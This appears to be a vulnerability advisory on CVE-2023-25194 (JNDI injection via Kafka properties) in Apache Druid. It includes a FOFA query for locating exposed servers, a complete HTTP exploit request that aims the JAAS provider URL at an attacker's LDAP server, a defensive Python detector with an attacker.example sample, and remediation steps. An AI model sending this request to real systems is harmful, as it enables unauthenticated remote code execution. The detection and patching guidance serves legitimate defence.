0x01 Product Introduction
Apache Druid is a high-performance real-time big data analysis engine that supports fast data ingestion, real-time query and data visualization. It is mainly used in OLAP (Online Analytical Processing) scenarios and can process PB-level data. Druid has the characteristics of high scalability, low latency and high throughput, and is widely used in real-time monitoring, event-driven analysis, user behavior analysis, network security and other fields. By using Druid, enterprises and developers can quickly obtain real-time analysis results and improve decision-making efficiency.
0x02 Vulnerability Overview
In scenarios where Apache Druid loads data from Apache Kafka, an unauthenticated remote attacker can supply Kafka connection properties and thereby exploit CVE-2023-25194 to trigger JNDI injection and ultimately execute arbitrary code. (Other products that use Apache Kafka Connect may also be affected by CVE-2023-25194.)
0x03 Scope of Impact
Affected versions
0.19.0 <= Apache Druid <= 25.0.0
Unaffected versions
Apache Druid >= 26.0.0 (the fix has not yet been officially released)
0x04 Reproduction Environment
FOFA syntax: title="Apache Druid"
Version used for reproduction: 24.0.1
0x05 Vulnerability Reproduction
Access the vulnerable environment.
Fill in any characters, click Apply, and capture the request with Burp.
POC:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close
{
  "type": "kafka",
  "spec": {
    "type": "kafka",
    "ioConfig": {
      "type": "kafka",
      "consumerProperties": {
        "bootstrap.servers": "1.1.1.1:9092",
        "sasl.mechanism": "SCRAM-SHA-256",
        "security.protocol": "SASL_SSL",
        "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
      },
      "topic": "any",
      "useEarliestOffset": true,
      "inputFormat": {
        "type": "regex",
        "pattern": "([\\s\\S]*)",
        "listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
        "columns": [
          "raw"
        ]
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {
        "column": "!!!_no_such_column_!!!",
        "missingValue": "1970-01-01T00:00:00Z"
      },
      "dimensionsSpec": {
      },
      "granularitySpec": {
        "rollup": false
      }
    },
    "tuningConfig": {
      "type": "kafka"
    }
  },
  "samplerConfig": {
    "numRows": 500,
    "timeoutMs": 15000
  }
}
Modify the request, filling in your malicious LDAP service URL in user.provider.url.
Use DNSlog to verify that the vulnerability exists.
The vulnerability exists.
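From the defender's side, the request above has a very recognisable shape: a sampler body whose consumerProperties carry a sasl.jaas.config that names JndiLoginModule or points a provider URL at a remote naming service. The following Python check is an added example written for this write-up, not code from Apache Druid or the original author; it walks a sampler request body (as a WAF, reverse proxy or log pipeline would see it) and returns findings, and it also covers the Kafka Connect override keys such as producer.override.sasl.jaas.config mentioned in the overview. The sample bodies, kafka.example and attacker.example are constructed placeholders.

```python
import json
import re

# Login module abused in CVE-2023-25194 and the JAAS options that carry the JNDI URL.
JNDI_MODULE = "com.sun.security.auth.module.JndiLoginModule"
PROVIDER_URL = re.compile(r'(?:user|group)\.provider\.url\s*=\s*"?([a-z]+:)', re.I)
REMOTE_SCHEMES = {"ldap:", "ldaps:", "rmi:", "iiop:", "dns:"}

def jaas_findings(props):
    """Return reasons why a Kafka client property map looks like a JNDI injection attempt."""
    reasons = []
    for key, value in props.items():
        # endswith() also catches Kafka Connect overrides like producer.override.sasl.jaas.config
        if not key.endswith("sasl.jaas.config") or not isinstance(value, str):
            continue
        if JNDI_MODULE in value:
            reasons.append(f"{key}: uses {JNDI_MODULE}")
        for scheme in PROVIDER_URL.findall(value):
            if scheme.lower() in REMOTE_SCHEMES:
                reasons.append(f"{key}: provider URL scheme {scheme}")
    return reasons

def inspect_sampler_body(body):
    """Walk a sampler request body and collect findings from every consumerProperties block."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []  # not JSON: nothing to inspect here
    findings, stack = [], [doc]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            props = node.get("consumerProperties")
            if isinstance(props, dict):
                findings.extend(jaas_findings(props))
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return findings

def sampler_body(jaas_config):
    """Constructed sample body in the shape of the PoC above (kafka.example is a placeholder)."""
    return json.dumps({"type": "kafka", "spec": {"type": "kafka", "ioConfig": {
        "type": "kafka", "topic": "any", "consumerProperties": {"bootstrap.servers": "kafka.example:9092",
        "security.protocol": "SASL_SSL", "sasl.jaas.config": jaas_config}}}})

MALICIOUS_BODY = sampler_body('com.sun.security.auth.module.JndiLoginModule required '
                              'user.provider.url="ldap://attacker.example" useFirstPass="true";')
BENIGN_BODY = sampler_body('org.apache.kafka.common.security.scram.ScramLoginModule required '
                           'username="alice" password="s3cret";')
```

A normal SCRAM login (BENIGN_BODY) produces no findings, while the PoC shape (MALICIOUS_BODY) produces one finding for the login module and one for the ldap: provider URL; either is a good alert condition on POST /druid/indexer/v1/sampler.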
0x06 Remediation
Security update
At present, Apache Druid has fixed this vulnerability upstream, but the new version has not been officially released. Users can download the source code and compile it themselves.
Users should keep watching for the official Apache Druid release and update promptly once it is available.
Reference: https://github.com/apache/druid/tree/26.0.0
Mitigation
1. Enable authentication for Apache Druid.
For details, please see: https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
2. Move Apache Druid to the internal network if business requirements permit.